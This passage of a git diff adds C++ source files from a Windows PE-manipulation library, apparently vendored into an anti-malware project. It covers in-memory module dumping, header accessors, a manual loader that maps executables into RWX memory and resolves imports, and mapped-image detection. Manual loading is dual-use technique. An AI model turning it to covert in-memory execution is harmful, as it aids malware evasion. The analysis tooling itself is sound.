(!peconv::fix_imports(buffer, mod_size, *exportsMap, NULL)) { + std::cerr << "[-] Unable to fix imports!" 
<< std::endl; + } + } + if (dump_mode == PE_DUMP_AUTO || dump_mode >= PE_DUMP_MODES_COUNT) { + dump_mode = detect_dump_mode(buffer, mod_size); + } + + BYTE* dump_data = buffer; + size_t dump_size = mod_size; + size_t out_size = 0; + BYTE* unmapped_module = nullptr; + + if (dump_mode == peconv::PE_DUMP_UNMAP || dump_mode == peconv::PE_DUMP_REALIGN) { + //if the image base in headers is invalid, set the current base and prevent from relocating PE: + if (peconv::get_image_base(buffer) == 0) { + peconv::update_image_base(buffer, (ULONGLONG)start_addr); + } + if (is_dot_net(buffer, mod_size)) { + fix_dot_net_ep(buffer, mod_size); + } + if (dump_mode == peconv::PE_DUMP_UNMAP) { + unmapped_module = pe_virtual_to_raw(buffer, mod_size, (ULONGLONG)start_addr, out_size, false); + } + else if (dump_mode == peconv::PE_DUMP_REALIGN) { + unmapped_module = peconv::pe_realign_raw_to_virtual(buffer, mod_size, (ULONGLONG)start_addr, out_size); + } + // unmap the PE file (convert from the Virtual Format into Raw Format) + if (unmapped_module) { + dump_data = unmapped_module; + dump_size = out_size; + } + } + // save the read module into a file + const bool is_dumped = dump_to_file(out_path, dump_data, dump_size); + + peconv::free_pe_buffer(unmapped_module, mod_size); + return is_dumped; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp new file mode 100644 index 0000000..ee9d4fb --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp @@ -0,0 +1,633 @@ +#include "peconv/pe_hdrs_helper.h" + +using namespace peconv; + +#ifdef _DEBUG +#include +#endif + +BYTE* peconv::get_nt_hdrs(IN const BYTE *pe_buffer, IN OPTIONAL size_t buffer_size) +{ + if (!pe_buffer) return nullptr; + + IMAGE_DOS_HEADER *idh = (IMAGE_DOS_HEADER*)pe_buffer; + if (buffer_size != 0) { + if (!peconv::validate_ptr((LPVOID)pe_buffer, buffer_size, (LPVOID)idh, sizeof(IMAGE_DOS_HEADER))) { + return nullptr; + } + } 
+ if (IsBadReadPtr(idh, sizeof(IMAGE_DOS_HEADER))) { + return nullptr; + } + if (idh->e_magic != IMAGE_DOS_SIGNATURE) { + return nullptr; + } + const LONG kMaxOffset = 1024; + LONG pe_offset = idh->e_lfanew; + + if (pe_offset > kMaxOffset) return nullptr; + + IMAGE_NT_HEADERS32 *inh = (IMAGE_NT_HEADERS32 *)(pe_buffer + pe_offset); + if (buffer_size != 0) { + if (!peconv::validate_ptr((LPVOID)pe_buffer, buffer_size, (LPVOID)inh, sizeof(IMAGE_NT_HEADERS32))) { + return nullptr; + } + } + if (IsBadReadPtr(inh, sizeof(IMAGE_NT_HEADERS32))) { + return nullptr; + } + if (inh->Signature != IMAGE_NT_SIGNATURE) { + return nullptr; + } + return (BYTE*)inh; +} + +IMAGE_NT_HEADERS32* peconv::get_nt_hdrs32(IN const BYTE *payload) +{ + if (!payload) return nullptr; + + BYTE *ptr = get_nt_hdrs(payload); + if (!ptr) return nullptr; + + if (!is64bit(payload)) { + return (IMAGE_NT_HEADERS32*)ptr; + } + return nullptr; +} + +IMAGE_NT_HEADERS64* peconv::get_nt_hdrs64(IN const BYTE *payload) +{ + if (payload == nullptr) return nullptr; + + BYTE *ptr = get_nt_hdrs(payload); + if (!ptr) return nullptr; + + if (is64bit(payload)) { + return (IMAGE_NT_HEADERS64*)ptr; + } + return nullptr; +} + +DWORD peconv::get_image_size(IN const BYTE *payload) +{ + if (!get_nt_hdrs(payload)) { + return 0; + } + DWORD image_size = 0; + if (is64bit(payload)) { + IMAGE_NT_HEADERS64* nt64 = get_nt_hdrs64(payload); + image_size = nt64->OptionalHeader.SizeOfImage; + } else { + IMAGE_NT_HEADERS32* nt32 = get_nt_hdrs32(payload); + image_size = nt32->OptionalHeader.SizeOfImage; + } + return image_size; +} + +bool peconv::update_image_size(IN OUT BYTE* payload, IN DWORD image_size) +{ + if (!get_nt_hdrs(payload)) { + return false; + } + if (is64bit(payload)) { + IMAGE_NT_HEADERS64* nt64 = get_nt_hdrs64(payload); + nt64->OptionalHeader.SizeOfImage = image_size; + } + else { + IMAGE_NT_HEADERS32* nt32 = get_nt_hdrs32(payload); + nt32->OptionalHeader.SizeOfImage = image_size; + } + return true; +} + +WORD 
peconv::get_nt_hdr_architecture(IN const BYTE *pe_buffer) +{ + void *ptr = get_nt_hdrs(pe_buffer); + if (!ptr) return 0; + + IMAGE_NT_HEADERS32 *inh = static_cast(ptr); + if (IsBadReadPtr(inh, sizeof(IMAGE_NT_HEADERS32))) { + return 0; + } + return inh->OptionalHeader.Magic; +} + +bool peconv::is64bit(IN const BYTE *pe_buffer) +{ + WORD arch = get_nt_hdr_architecture(pe_buffer); + if (arch == IMAGE_NT_OPTIONAL_HDR64_MAGIC) { + return true; + } + return false; +} + +IMAGE_DATA_DIRECTORY* peconv::get_directory_entry(IN const BYTE *pe_buffer, IN DWORD dir_id, IN bool allow_empty) +{ + if (dir_id >= IMAGE_NUMBEROF_DIRECTORY_ENTRIES) return nullptr; + + BYTE* nt_headers = get_nt_hdrs((BYTE*)pe_buffer); + if (!nt_headers) return nullptr; + + IMAGE_DATA_DIRECTORY* peDir = nullptr; + if (is64bit(pe_buffer)) { + IMAGE_NT_HEADERS64* nt_headers64 = (IMAGE_NT_HEADERS64*)nt_headers; + peDir = &(nt_headers64->OptionalHeader.DataDirectory[dir_id]); + } + else { + IMAGE_NT_HEADERS32* nt_headers64 = (IMAGE_NT_HEADERS32*)nt_headers; + peDir = &(nt_headers64->OptionalHeader.DataDirectory[dir_id]); + } + if (!allow_empty && peDir->VirtualAddress == NULL) { + return nullptr; + } + return peDir; +} + +ULONGLONG peconv::get_image_base(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return 0; + } + ULONGLONG img_base = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + img_base = payload_nt_hdr64->OptionalHeader.ImageBase; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + img_base = static_cast(payload_nt_hdr32->OptionalHeader.ImageBase); + } + return img_base; +} + +DWORD peconv::get_entry_point_rva(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if 
(!payload_nt_hdr) { + return 0; + } + DWORD value = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + value = payload_nt_hdr64->OptionalHeader.AddressOfEntryPoint; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + value = payload_nt_hdr32->OptionalHeader.AddressOfEntryPoint; + } + return value; +} + +bool peconv::update_entry_point_rva(IN OUT BYTE *pe_buffer, IN DWORD value) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.AddressOfEntryPoint = value; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + payload_nt_hdr32->OptionalHeader.AddressOfEntryPoint = value; + } + return true; +} + +DWORD peconv::get_hdrs_size(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return 0; + } + DWORD hdrs_size = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + hdrs_size = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + hdrs_size = payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + } + return hdrs_size; +} + +bool peconv::update_image_base(IN OUT BYTE* payload, IN ULONGLONG destImageBase) +{ + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.ImageBase = (ULONGLONG)destImageBase; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + 
payload_nt_hdr32->OptionalHeader.ImageBase = (DWORD)destImageBase; + } + return true; +} + +template +inline const IMAGE_FILE_HEADER* fetch_file_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + if (!payload || !payload_nt_hdr) return nullptr; + + const IMAGE_FILE_HEADER *fileHdr = &(payload_nt_hdr->FileHeader); + + if (!validate_ptr((const LPVOID)payload, buffer_size, (const LPVOID)fileHdr, sizeof(IMAGE_FILE_HEADER))) { + return nullptr; + } + return fileHdr; +} + +const IMAGE_FILE_HEADER* peconv::get_file_hdr(IN const BYTE* payload, IN const size_t buffer_size) +{ + if (!payload) return nullptr; + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return nullptr; + } + if (is64bit(payload)) { + return fetch_file_hdr(payload, buffer_size, (IMAGE_NT_HEADERS64*)payload_nt_hdr); + } + return fetch_file_hdr(payload, buffer_size, (IMAGE_NT_HEADERS32*)payload_nt_hdr); +} + +template +inline const LPVOID fetch_opt_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + if (!payload) return nullptr; + + const IMAGE_FILE_HEADER *fileHdr = fetch_file_hdr(payload, buffer_size, payload_nt_hdr); + if (!fileHdr) { + return nullptr; + } + const LPVOID opt_hdr = (const LPVOID) &(payload_nt_hdr->OptionalHeader); + const size_t opt_size = fileHdr->SizeOfOptionalHeader; + if (!validate_ptr((const LPVOID)payload, buffer_size, opt_hdr, opt_size)) { + return nullptr; + } + return opt_hdr; +} + +LPVOID peconv::get_optional_hdr(IN const BYTE* payload, IN const size_t buffer_size) +{ + if (!payload) return nullptr; + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + const IMAGE_FILE_HEADER* fileHdr = get_file_hdr(payload, buffer_size); + if (!payload_nt_hdr || !fileHdr) { + return nullptr; + } + if (is64bit(payload)) { + return fetch_opt_hdr(payload,buffer_size, (IMAGE_NT_HEADERS64*)payload_nt_hdr); + } + return fetch_opt_hdr(payload, buffer_size, 
(IMAGE_NT_HEADERS32*)payload_nt_hdr); +} + +template +inline LPVOID fetch_section_hdrs_ptr(IN const BYTE* payload, IN const size_t buffer_size, IN const IMAGE_NT_HEADERS_T *payload_nt_hdr) +{ + const IMAGE_FILE_HEADER *fileHdr = fetch_file_hdr(payload, buffer_size, payload_nt_hdr); + if (!fileHdr) { + return nullptr; + } + const size_t opt_size = fileHdr->SizeOfOptionalHeader; + BYTE* opt_hdr = (BYTE*)fetch_opt_hdr(payload, buffer_size, payload_nt_hdr); + if (!validate_ptr((const LPVOID)payload, buffer_size, opt_hdr, opt_size)) { + return nullptr; + } + //sections headers starts right after the end of the optional header + return (LPVOID)(opt_hdr + opt_size); +} + +size_t peconv::get_sections_count(IN const BYTE* payload, IN const size_t buffer_size) +{ + const IMAGE_FILE_HEADER* fileHdr = get_file_hdr(payload, buffer_size); + if (!fileHdr) { + return 0; + } + return fileHdr->NumberOfSections; +} + +bool peconv::is_valid_sections_hdr_offset(IN const BYTE* buffer, IN const size_t buffer_size) +{ + size_t sec_count = peconv::get_sections_count(buffer, buffer_size); + if (sec_count == 0) { + //no sections found - a valid PE should have at least one section + return false; + } + PIMAGE_SECTION_HEADER last_hdr = get_section_hdr(buffer, buffer_size, sec_count - 1); + if (!last_hdr) { + //could not fetch the last section + return false; + } + return true; +} + +PIMAGE_SECTION_HEADER peconv::get_section_hdr(IN const BYTE* payload, IN const size_t buffer_size, IN size_t section_num) +{ + if (!payload) return nullptr; + + const size_t sections_count = peconv::get_sections_count(payload, buffer_size); + if (section_num >= sections_count) { + return nullptr; + } + + LPVOID nt_hdrs = peconv::get_nt_hdrs(payload); + if (!nt_hdrs) return nullptr; //this should never happened, because the get_sections_count did not fail + + LPVOID secptr = nullptr; + //get the beginning of sections headers: + if (is64bit(payload)) { + secptr = fetch_section_hdrs_ptr(payload, buffer_size, 
(IMAGE_NT_HEADERS64*)nt_hdrs); + } + else { + secptr = fetch_section_hdrs_ptr(payload, buffer_size, (IMAGE_NT_HEADERS32*)nt_hdrs); + } + //get the section header of given number: + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)( + (ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * section_num) + ); + //validate pointer: + if (!validate_ptr((const LPVOID) payload, buffer_size, (const LPVOID) next_sec, sizeof(IMAGE_SECTION_HEADER))) { + return nullptr; + } + return next_sec; +} + +WORD peconv::get_file_characteristics(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return 0; + } + IMAGE_FILE_HEADER *fileHdr = nullptr; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + } + return fileHdr->Characteristics; +} + +bool peconv::is_module_dll(IN const BYTE* payload) +{ + if (!payload) return false; + WORD charact = get_file_characteristics(payload); + return ((charact & IMAGE_FILE_DLL) != 0); +} + +WORD peconv::get_dll_characteristics(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return 0; + } + WORD charact = 0; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + charact = payload_nt_hdr64->OptionalHeader.DllCharacteristics; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + charact = payload_nt_hdr32->OptionalHeader.DllCharacteristics; + } + return charact; +} + +bool peconv::set_subsystem(IN OUT BYTE* payload, IN WORD subsystem) +{ + if (!payload) return false; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = 
get_nt_hdrs(payload); + if (!payload_nt_hdr) { + return false; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + payload_nt_hdr64->OptionalHeader.Subsystem = subsystem; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + payload_nt_hdr32->OptionalHeader.Subsystem = subsystem; + } + return true; +} + +WORD peconv::get_subsystem(IN const BYTE* payload) +{ + if (!payload) return 0; + + bool is64b = is64bit(payload); + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + return 0; + } + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + return payload_nt_hdr64->OptionalHeader.Subsystem; + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + return payload_nt_hdr32->OptionalHeader.Subsystem; + } +} + +bool peconv::has_relocations(IN const BYTE *pe_buffer) +{ + IMAGE_DATA_DIRECTORY* relocDir = get_directory_entry(pe_buffer, IMAGE_DIRECTORY_ENTRY_BASERELOC); + if (!relocDir) { + return false; + } + return true; +} + +IMAGE_EXPORT_DIRECTORY* peconv::get_export_directory(IN HMODULE modulePtr) +{ + return get_type_directory(modulePtr, IMAGE_DIRECTORY_ENTRY_EXPORT); +} + + +IMAGE_COR20_HEADER * peconv::get_dotnet_hdr(IN const BYTE* module, IN size_t const module_size, IN const IMAGE_DATA_DIRECTORY * dotNetDir) +{ + DWORD rva = dotNetDir->VirtualAddress; + DWORD hdr_size = dotNetDir->Size; + if (!peconv::validate_ptr(module, module_size, module + rva, hdr_size)) { + return nullptr; + } + IMAGE_COR20_HEADER *dnet_hdr = (IMAGE_COR20_HEADER*)(module + rva); + if (!peconv::validate_ptr(module, module_size, module + dnet_hdr->MetaData.VirtualAddress, dnet_hdr->MetaData.Size)) { + return nullptr; + } + DWORD* signature_ptr = (DWORD*)(module + dnet_hdr->MetaData.VirtualAddress); + const DWORD dotNetSign = 0x424A5342; + if (*signature_ptr != dotNetSign) { + //invalid header + return nullptr; + } 
+ return dnet_hdr; +} + +template +DWORD* _get_sec_alignment_ptr(const BYTE* modulePtr, bool is_raw) +{ + IMAGE_NT_HEADERS_T* hdrs = reinterpret_cast(peconv::get_nt_hdrs(modulePtr)); + if (!hdrs) return nullptr; + if (is_raw) { + return &hdrs->OptionalHeader.FileAlignment; + } + return &hdrs->OptionalHeader.SectionAlignment; +} + +DWORD peconv::get_sec_alignment(IN const BYTE* modulePtr, IN bool is_raw) +{ + DWORD* alignment = 0; + if (peconv::is64bit(modulePtr)) { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } else { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + if (!alignment) return 0; + return *alignment; +} + +bool peconv::set_sec_alignment(IN OUT BYTE* modulePtr, IN bool is_raw, IN DWORD new_alignment) +{ + DWORD* alignment = 0; + if (peconv::is64bit(modulePtr)) { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + else { + alignment = _get_sec_alignment_ptr(modulePtr, is_raw); + } + if (!alignment) return false; + + *alignment = new_alignment; + return true; +} + +DWORD peconv::get_virtual_sec_size(IN const BYTE* pe_hdr, IN const PIMAGE_SECTION_HEADER sec_hdr, IN bool rounded) +{ + if (!pe_hdr || !sec_hdr) { + return 0; + } + if (!rounded) { + return sec_hdr->Misc.VirtualSize;; + } + //TODO: calculate real size, round up to Virtual Alignment + DWORD alignment = peconv::get_sec_alignment((const PBYTE)pe_hdr, false); + DWORD vsize = sec_hdr->Misc.VirtualSize; + + DWORD units = vsize / alignment; + if ((vsize % alignment) > 0) units++; + + vsize = units * alignment; + + DWORD image_size = peconv::get_image_size(pe_hdr); + //if it is bigger than the image size, use the size from the headers + if ((sec_hdr->VirtualAddress + vsize) > image_size) { + vsize = sec_hdr->Misc.VirtualSize; + } + return vsize; +} + +PIMAGE_SECTION_HEADER peconv::get_last_section(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw) +{ + SIZE_T module_end = peconv::get_hdrs_size(pe_buffer); + const size_t sections_count = 
peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) { + return nullptr; + } + PIMAGE_SECTION_HEADER last_sec = nullptr; + //walk through sections + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec) break; + + size_t new_end = is_raw ? (sec->PointerToRawData + sec->SizeOfRawData) : (sec->VirtualAddress + sec->Misc.VirtualSize); + if (new_end > module_end) { + module_end = new_end; + last_sec = sec; + } + } + return last_sec; +} + +DWORD peconv::calc_pe_size(IN const PBYTE pe_buffer, IN size_t pe_size, IN bool is_raw) +{ + DWORD module_end = peconv::get_hdrs_size(pe_buffer); + const size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) { + return module_end; + } + //walk through sections + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec) break; + + DWORD new_end = is_raw ? (sec->PointerToRawData + sec->SizeOfRawData) : (sec->VirtualAddress + sec->Misc.VirtualSize); + if (new_end > module_end) module_end = new_end; + } + return module_end; +} + +bool peconv::is_valid_sectons_alignment(IN const BYTE* payload, IN const SIZE_T payload_size, IN bool is_raw) +{ + if (payload == NULL) return false; + + const DWORD my_align = peconv::get_sec_alignment(payload, is_raw); + if (my_align == 0) { +#ifdef _DEBUG + std::cout << "Section alignment cannot be 0\n"; +#endif + return false; + } + const size_t sections_count = peconv::get_sections_count(payload, payload_size); + if (sections_count == 0) { + //no sections + return false; + } + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER next_sec = peconv::get_section_hdr(payload, payload_size, i); + if (!next_sec) return false; //the number of the sections in header is out of scope + + const DWORD next_sec_addr = is_raw ? 
(next_sec->PointerToRawData) : (next_sec->VirtualAddress); + + SIZE_T sec_size = is_raw ? next_sec->SizeOfRawData : next_sec->Misc.VirtualSize; + if (sec_size == 0) continue; + if (next_sec->Misc.VirtualSize == 0) { + continue; // if the VirtualSize == 0 the section will not be mapped anyways + } + if (next_sec_addr == 0) { + //if cannot be 0 if the size is not 0 + return false; + } + + //check only if raw_align is non-zero + if (my_align && next_sec_addr % my_align != 0) { +#ifdef _DEBUG + std::cout << "Section is misaligned\n"; +#endif + return false; //misaligned + } + } + return true; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp new file mode 100644 index 0000000..e1720fe --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_loader.cpp @@ -0,0 +1,122 @@ +#include "peconv/pe_loader.h" + +#include "peconv/relocate.h" +#include "peconv/imports_loader.h" +#include "peconv/buffer_util.h" +#include "peconv/function_resolver.h" +#include "peconv/exports_lookup.h" + +#include + +using namespace peconv; + +namespace peconv { + BYTE* load_no_sec_pe(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable) + { + ULONGLONG desired_base = 0; + size_t out_size = (r_size < PAGE_SIZE) ? PAGE_SIZE : r_size; + if (executable) { + desired_base = get_image_base(dllRawData); + out_size = peconv::get_image_size(dllRawData); + } + DWORD protect = (executable) ? 
PAGE_EXECUTE_READWRITE : PAGE_READWRITE; + BYTE* mappedPE = peconv::alloc_pe_buffer(out_size, protect, desired_base); + if (!mappedPE) { + return NULL; + } + memcpy(mappedPE, dllRawData, r_size); + v_size = out_size; + return mappedPE; + } +}; + +BYTE* peconv::load_pe_module(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, bool executable, bool relocate) +{ + if (!peconv::get_nt_hdrs(dllRawData)) { + return NULL; + } + if (peconv::get_sections_count(dllRawData, r_size) == 0) { + return load_no_sec_pe(dllRawData, r_size, v_size, executable); + } + // by default, allow to load the PE at any base: + ULONGLONG desired_base = NULL; + // if relocating is required, but the PE has no relocation table... + if (relocate && !has_relocations(dllRawData)) { + // ...enforce loading the PE image at its default base (so that it will need no relocations) + desired_base = get_image_base(dllRawData); + } + // load a virtual image of the PE file at the desired_base address (random if desired_base is NULL): + BYTE *mappedDLL = pe_raw_to_virtual(dllRawData, r_size, v_size, executable, desired_base); + if (mappedDLL) { + //if the image was loaded at its default base, relocate_module will return always true (because relocating is already done) + if (relocate && !relocate_module(mappedDLL, v_size, (ULONGLONG)mappedDLL)) { + // relocating was required, but it failed - thus, the full PE image is useless + printf("Could not relocate the module!"); + free_pe_buffer(mappedDLL, v_size); + mappedDLL = NULL; + } + } else { + printf("Could not allocate memory at the desired base!\n"); + } + return mappedDLL; +} + +BYTE* peconv::load_pe_module(const char *filename, OUT size_t &v_size, bool executable, bool relocate) +{ + size_t r_size = 0; + BYTE *dllRawData = load_file(filename, r_size); + if (!dllRawData) { +#ifdef _DEBUG + std::cerr << "Cannot load the file: " << filename << std::endl; +#endif + return NULL; + } + BYTE* mappedPE = load_pe_module(dllRawData, r_size, v_size, executable, 
relocate); + free_pe_buffer(dllRawData); + return mappedPE; +} + +BYTE* peconv::load_pe_executable(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, t_function_resolver* import_resolver) +{ + BYTE* loaded_pe = load_pe_module(dllRawData, r_size, v_size, true, true); + if (!loaded_pe) { + printf("[-] Loading failed!\n"); + return NULL; + } +#if _DEBUG + printf("Loaded at: %p\n", loaded_pe); +#endif + if (has_valid_import_table(loaded_pe, v_size)) { + if (!load_imports(loaded_pe, import_resolver)) { + printf("[-] Loading imports failed!"); + free_pe_buffer(loaded_pe, v_size); + return NULL; + } + } + else { + printf("[-] PE doesn't have a valid Import Table!\n"); + } + return loaded_pe; +} + + +BYTE* peconv::load_pe_executable(const char *my_path, OUT size_t &v_size, t_function_resolver* import_resolver) +{ +#if _DEBUG + printf("Module: %s\n", my_path); +#endif + BYTE* loaded_pe = load_pe_module(my_path, v_size, true, true); + if (!loaded_pe) { + printf("Loading failed!\n"); + return NULL; + } +#if _DEBUG + printf("Loaded at: %p\n", loaded_pe); +#endif + if (!load_imports(loaded_pe, import_resolver)) { + printf("[-] Loading imports failed!"); + free_pe_buffer(loaded_pe, v_size); + return NULL; + } + return loaded_pe; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp new file mode 100644 index 0000000..13fb75e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_mode_detector.cpp @@ -0,0 +1,205 @@ +#include "peconv/pe_mode_detector.h" +#include "peconv/util.h" +#include "peconv/imports_loader.h" +#include "peconv/relocate.h" + +#ifdef _DEBUG +#include +#endif + +// Check if gaps between sections are typical for Virtual Alignment. +// Returns true if confirmed, false if not confirmed. False result can also mean that data was invalid/insufficient to decide. 
+bool is_virtual_padding(const BYTE* pe_buffer, size_t pe_size) +{ + const size_t r_align = peconv::get_sec_alignment((PBYTE)pe_buffer, true); + + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count < 2) return false; + + bool is_valid_padding = false; + for (size_t i = 1; i < sections_count; i += 2) { + PIMAGE_SECTION_HEADER sec1 = peconv::get_section_hdr(pe_buffer, pe_size, i-1); + PIMAGE_SECTION_HEADER sec2 = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec1 || !sec2) continue; //skip if fetching any of the sections failed + + if (sec1->SizeOfRawData == 0) continue; //skip empty sections + + const DWORD sec1_end_offset = sec1->VirtualAddress + sec1->SizeOfRawData; + if (sec2->VirtualAddress == sec1_end_offset) continue; + + if (sec2->VirtualAddress < sec1_end_offset) { + //std::cout << "Invalid size of the section: " << std::hex << sec2->VirtualAddress << " vs "<< sec1_end_offset << std::endl; + return false; + } + const size_t diff = sec2->VirtualAddress - sec1_end_offset; + if (diff < r_align) continue; //to small to determine + + BYTE* sec1_end_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec1_end_offset); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec1_end_ptr, diff)) { + //std::cout << "Invalid pointer to the section\n"; + return false; + } + if (peconv::is_padding(sec1_end_ptr, diff, 0)) { + is_valid_padding = true; + } + else { + return false; + } + } + return is_valid_padding; +} + +// Check if the gap between the end of headers and the first section is typical for Virtual Alignment. +// Returns true if confirmed, false if not confirmed. False result can also mean that data was invalid/insufficient to decide. 
+bool is_hdr_virtual_align(const BYTE* pe_buffer, size_t pe_size) +{ + const size_t v_align = peconv::get_sec_alignment((PBYTE)pe_buffer, false); + if (peconv::get_hdrs_size(pe_buffer) >= v_align) { + //undetermined for such case + return false; + } + //walk through sections and check their sizes + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + if (sections_count == 0) return false; + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!sec || sec->PointerToRawData == 0 || sec->SizeOfRawData == 0) { + continue; // check next + } + if (sec->PointerToRawData >= v_align) continue; + + size_t diff = v_align - sec->PointerToRawData; + BYTE* sec_raw_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec->PointerToRawData); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec_raw_ptr, diff)) { + return false; + } + if (peconv::is_padding(sec_raw_ptr, diff, 0)) { + return true; + } + } + return false; +} + +bool sec_hdrs_erased(IN const BYTE* pe_buffer, IN size_t pe_size, bool is_raw) +{ + const size_t count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < count; i++) { + const IMAGE_SECTION_HEADER* hdr = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!hdr) continue; + if (is_raw) { + if (hdr->PointerToRawData != 0) return false; + } + else { + if (hdr->VirtualAddress != 0) return false; + } + } + return true; +} + +bool peconv::is_pe_raw_eq_virtual(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + const size_t count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < count; i++) { + const IMAGE_SECTION_HEADER* hdr = peconv::get_section_hdr(pe_buffer, pe_size, i); + if (!hdr) continue; + + if (hdr->VirtualAddress != hdr->PointerToRawData) { + return false; + } + } + return true; +} + +bool is_pe_mapped(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + size_t v_score = 0; + if 